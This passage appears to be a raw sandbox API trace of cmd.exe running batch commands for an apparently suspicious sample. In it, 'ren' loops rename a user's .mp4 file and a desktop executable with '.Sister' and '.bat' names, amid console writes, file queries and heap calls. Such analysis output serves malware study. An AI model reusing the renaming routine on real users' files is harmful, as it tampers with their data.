lpReserved=0x0 | out: lpBuffer=0x21ed8d5e8c0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0141.936] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"AiNxYR.mp4\" \"AiNxYR.mp4.Sister\" ") returned 34 [0141.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.936] GetFileType (hFile=0x50) returned 0x2 [0141.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.936] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0142.034] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.034] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x22, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x22) returned 1 [0142.162] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0142.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.162] GetFileType (hFile=0x50) returned 0x2 [0142.162] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.162] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0142.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.166] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0142.167] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0142.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.167] GetFileType (hFile=0x50) returned 0x2 [0142.168] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.168] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0142.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.169] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0142.178] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0142.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.178] GetFileType (hFile=0x50) returned 0x2 [0142.178] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.178] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0142.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.220] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0142.225] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0142.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.225] GetFileType (hFile=0x50) returned 0x2 [0142.225] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.225] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.229] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0142.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.247] GetFileType (hFile=0x50) returned 0x2 [0142.247] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.247] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.256] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d5ecd0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d5ecd0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0142.260] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"AiNxYR.mp4.Sister\" \"AiNxYR.bat\" ") returned 34 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.260] GetFileType (hFile=0x50) returned 0x2 [0142.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.261] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0142.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.314] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x22, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x22) returned 1 [0142.331] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.331] GetFileType (hFile=0x50) returned 0x2 [0142.331] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.331] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0142.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.353] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0142.366] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0142.369] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0142.369] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0142.370] malloc (_Size=0xffce) returned 0x21ed90fff80 [0142.371] ??_V@YAXPEAX@Z () returned 0x21ed90fff80 [0142.371] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0142.372] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0142.372] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0142.372] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0142.372] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0142.372] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0142.372] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0142.372] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0142.372] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0142.372] ??_V@YAXPEAX@Z () returned 0x1 [0142.372] GetProcessHeap () returned 0x21ed8c70000 [0142.372] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x98) returned 0x21ed92c1050 [0142.372] GetProcessHeap () returned 0x21ed8c70000 [0142.372] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92c1050, Size=0x54) returned 0x21ed92c1050 [0142.372] GetProcessHeap () returned 0x21ed8c70000 [0142.372] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92c1050) returned 0x54 [0142.372] GetProcessHeap () returned 0x21ed8c70000 [0142.372] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x5c) returned 0x21ed92c10c0 [0142.372] GetProcessHeap () returned 0x21ed8c70000 [0142.372] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x98) returned 0x21ed8d44240 [0142.373] GetProcessHeap () returned 0x21ed8c70000 [0142.373] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44240, Size=0x54) returned 0x21ed8d44240 [0142.373] GetProcessHeap () returned 0x21ed8c70000 [0142.373] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44240) returned 0x54 [0142.373] malloc (_Size=0xffce) returned 0x21ed90fff80 [0142.373] ??_V@YAXPEAX@Z () returned 0x21ed90fff80 [0142.373] GetProcessHeap () returned 0x21ed8c70000 [0142.373] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42d30 [0142.373] GetProcessHeap () returned 0x21ed8c70000 [0142.373] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5de90 [0142.373] _wcsicmp (_String1="AiNxYR.mp4", _String2=".") returned 51 [0142.373] _wcsicmp (_String1="AiNxYR.mp4", _String2="..") returned 51 [0142.373] GetFileAttributesW (lpFileName="AiNxYR.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ainxyr.mp4")) returned 0x20 [0142.373] GetProcessHeap () returned 0x21ed8c70000 [0142.373] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92e1220 [0142.396] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92e1230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0142.396] SetErrorMode (uMode=0x0) returned 0x0 [0142.396] SetErrorMode (uMode=0x1) returned 0x0 [0142.396] GetFullPathNameW (in: lpFileName="AiNxYR.mp4", nBufferLength=0x7fe7, lpBuffer=0x21ed90fff80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\AiNxYR.mp4", lpFilePart=0xa6cf4fd660*="AiNxYR.mp4") returned 0x22 [0142.397] SetErrorMode (uMode=0x0) returned 0x1 [0142.397] GetProcessHeap () returned 0x21ed8c70000 [0142.397] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5bee0 [0142.399] _wcsicmp (_String1="AiNxYR.mp4", _String2=".") returned 51 [0142.399] _wcsicmp (_String1="AiNxYR.mp4", _String2="..") returned 51 [0142.399] GetFileAttributesW (lpFileName="AiNxYR.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ainxyr.mp4")) returned 0x20 [0142.399] ??_V@YAXPEAX@Z () returned 0x1 [0142.399] malloc (_Size=0xffce) returned 0x21ed90fff80 [0142.399] ??_V@YAXPEAX@Z () returned 0x21ed90fff80 [0142.399] malloc (_Size=0xffce) returned 0x21ed910ff60 [0142.399] ??_V@YAXPEAX@Z () returned 0x21ed910ff60 [0142.400] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AiNxYR.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ainxyr.mp4")) returned 0x20 [0142.400] malloc (_Size=0xffce) returned 0x21ed911ff40 [0142.400] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0142.401] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\AiNxYR.mp4", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5dea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5dea0) returned 0x21ed8d42fd0 [0142.401] malloc (_Size=0xffce) returned 0x21ed912ff20 [0142.401] ??_V@YAXPEAX@Z () returned 0x21ed912ff20 [0142.402] ??_V@YAXPEAX@Z () returned 0x1 [0142.402] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\AiNxYR.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ainxyr.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\AiNxYR.mp4.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\ainxyr.mp4.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0142.403] FindNextFileW (in: hFindFile=0x21ed8d42fd0, lpFindFileData=0x21ed8d5dea0 | out: lpFindFileData=0x21ed8d5dea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ac2b30, ftCreationTime.dwHighDateTime=0x1d5e8ea, ftLastAccessTime.dwLowDateTime=0x46178560, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x46178560, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x1307e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AiNxYR.mp4", cAlternateFileName="")) returned 0 [0142.405] GetLastError () returned 0x12 [0142.405] FindClose (in: hFindFile=0x21ed8d42fd0 | out: hFindFile=0x21ed8d42fd0) returned 1 [0142.405] ??_V@YAXPEAX@Z () returned 0x1 [0142.406] ??_V@YAXPEAX@Z () returned 0x1 [0142.407] ??_V@YAXPEAX@Z () returned 0x1 [0142.411] ??_V@YAXPEAX@Z () returned 0x1 [0142.411] GetProcessHeap () returned 0x21ed8c70000 [0142.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43930 [0142.411] GetProcessHeap () returned 0x21ed8c70000 [0142.411] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95960, Size=0x16) returned 0x21ed8c95600 [0142.411] GetProcessHeap () returned 0x21ed8c70000 [0142.411] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95600) returned 0x16 [0142.411] GetProcessHeap () returned 0x21ed8c70000 [0142.411] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0142.412] GetProcessHeap () returned 0x21ed8c70000 [0142.412] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0142.413] GetProcessHeap () returned 0x21ed8c70000 [0142.413] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d442b0 [0142.413] GetProcessHeap () returned 0x21ed8c70000 [0142.413] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d442b0, Size=0xb2) returned 0x21ed8d442b0 [0142.413] GetProcessHeap () returned 0x21ed8c70000 [0142.413] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d442b0) returned 0xb2 [0142.413] GetProcessHeap () returned 0x21ed8c70000 [0142.413] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5ee30 [0142.414] GetProcessHeap () returned 0x21ed8c70000 [0142.414] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5ee30, Size=0x30) returned 0x21ed8d5ee30 [0142.414] GetProcessHeap () returned 0x21ed8c70000 [0142.414] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5ee30) returned 0x30 [0142.414] GetProcessHeap () returned 0x21ed8c70000 [0142.414] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5ee70 [0142.414] malloc (_Size=0x1ff9c) returned 0x21ed90fff80 [0142.418] GetProcessHeap () returned 0x21ed8c70000 [0142.418] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d46f10 [0142.418] GetProcessHeap () returned 0x21ed8c70000 [0142.418] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d47750 [0142.418] ??_V@YAXPEAX@Z () returned 0x1 [0142.420] malloc (_Size=0x1ff9c) returned 0x21ed90fff80 [0142.435] GetProcessHeap () returned 0x21ed8c70000 [0142.435] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d46a90 [0142.435] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed90fff80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0142.435] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd92c10e0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43a50 [0142.435] FindClose (in: hFindFile=0x21ed8d43a50 | out: hFindFile=0x21ed8d43a50) returned 1 [0142.435] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd92c10e0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d43570 [0142.436] FindClose (in: hFindFile=0x21ed8d43570 | out: hFindFile=0x21ed8d43570) returned 1 [0142.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7f7cd874, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7f7cd874, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd92c10e0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43990 [0142.436] FindClose (in: hFindFile=0x21ed8d43990 | out: hFindFile=0x21ed8d43990) returned 1 [0142.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x21e, dwReserved1=0xd92c10e0, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8d43150 [0142.436] FindClose (in: hFindFile=0x21ed8d43150 | out: hFindFile=0x21ed8d43150) returned 1 [0142.436] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0142.436] malloc (_Size=0x1ff9c) returned 0x21ed911ff30 [0142.436] ??_V@YAXPEAX@Z () returned 0x21ed911ff30 [0142.438] GetProcessHeap () returned 0x21ed8c70000 [0142.438] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d44380 [0142.438] ??_V@YAXPEAX@Z () returned 0x1 [0142.438] ??_V@YAXPEAX@Z () returned 0x1 [0142.440] GetProcessHeap () returned 0x21ed8c70000 [0142.440] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5ee70, Size=0x490) returned 0x21ed8d5ee70 [0142.440] GetProcessHeap () returned 0x21ed8c70000 [0142.440] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5ee70) returned 0x490 [0142.440] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0142.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.440] GetFileType (hFile=0x50) returned 0x2 [0142.440] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.440] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0142.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.446] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0142.457] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0142.457] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0142.457] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0142.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.457] GetFileType (hFile=0x50) returned 0x2 [0142.458] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.458] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0142.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.469] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0142.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.472] GetFileType (hFile=0x50) returned 0x2 [0142.473] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.473] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0142.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.474] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d5ee40*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d5ee40*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0142.479] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0142.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.479] GetFileType (hFile=0x50) returned 0x2 [0142.480] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.480] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0142.492] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.493] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0142.554] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0142.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.554] GetFileType (hFile=0x50) returned 0x2 [0142.554] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.554] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.557] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0142.566] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0142.626] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0142.627] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0142.628] malloc (_Size=0xffce) returned 0x21ed90fff80 [0142.629] ??_V@YAXPEAX@Z () returned 0x21ed90fff80 [0142.629] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0142.629] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0142.629] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0142.629] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0142.629] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0142.630] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0142.630] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0142.630] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0142.630] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0142.630] ??_V@YAXPEAX@Z () returned 0x1 [0142.630] GetProcessHeap () returned 0x21ed8c70000 [0142.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d44400 [0142.630] GetProcessHeap () returned 0x21ed8c70000 [0142.630] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44400, Size=0x130) returned 0x21ed8d44400 [0142.630] GetProcessHeap () returned 0x21ed8c70000 [0142.630] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44400) returned 0x130 [0142.630] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.630] malloc (_Size=0xffce) returned 0x21ed90fff80 [0142.630] ??_V@YAXPEAX@Z () returned 0x21ed90fff80 [0142.630] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.630] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed90fff80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: 